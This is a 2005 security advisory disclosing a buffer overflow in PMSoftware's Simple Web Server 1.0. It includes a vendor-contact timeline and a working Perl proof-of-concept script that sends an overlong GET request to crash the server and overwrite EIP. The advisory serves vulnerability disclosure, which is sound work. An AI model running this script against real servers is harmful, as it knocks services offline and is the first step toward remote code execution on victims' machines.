ERNW Security Advisory 01-2005 Buffer Overflow in PMSoftware's Simple Web Server Author: Michael Thumann 1. Summary: Simple Web Server doesn't do proper bounds checking handling normal GET requests. Sending an overlong page or script name, it causes an buffer overflow and an attacker can controll the EIP to run arbitrary code on the victims machine. 2. Severity : Critical 3. Systems affected The vulnerability was testest with Simple Web Server 1.0 4. Patch Availability : No patch available 5. Details The follwoing request causes Simple Web Server to crash: GET /AAAAAA.....AAAA with 260 As A Proof of Concept Code is published with this Advisory 6. Solution Use another web server ;-) 7. Time-Line 17 Feb 2005: Vulnerability reported to vendor 28 Feb 2005: 2nd report because the vendor didn't respond 07 Mar 2005: 3rd mail sent to thre vendor - vendor didn't respond 18 Apr 2005: Public Disclosure 8. Exploit #!/usr/bin/perl # DoS Exploit By mthumann@ernw.de # Tested against WinXP + SP2 # Remote Buffer Overflow in PMSoftware Simple Web Server 1.0.15 # buffer[250] use Socket; print "PMSoftware Simple Web Server Exploit by Michael Thumann \n\n"; if (not $ARGV[0]) { print "Usage: swsexploit.pl \n"; exit;} $ip=$ARGV[0]; print "Sending Shellcode to: " . $ip . "\n\n"; my $testcode= "ERNWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB". "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC". "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD". "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE". "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF". "ABCDEFGHIJAAAA"; #EIP =41414141 my $attack="GET /".$testcode." HTTP/1.1\n" ; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $attack; my @in=; select(STDOUT); close(S); } else { die("Can't connect...\n"); } 9. Disclaimer The informations in this advisory are provided "AS IS" without warranty of any kind. In no event shall the authors be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages due to the misuse of any information provided in this advisory.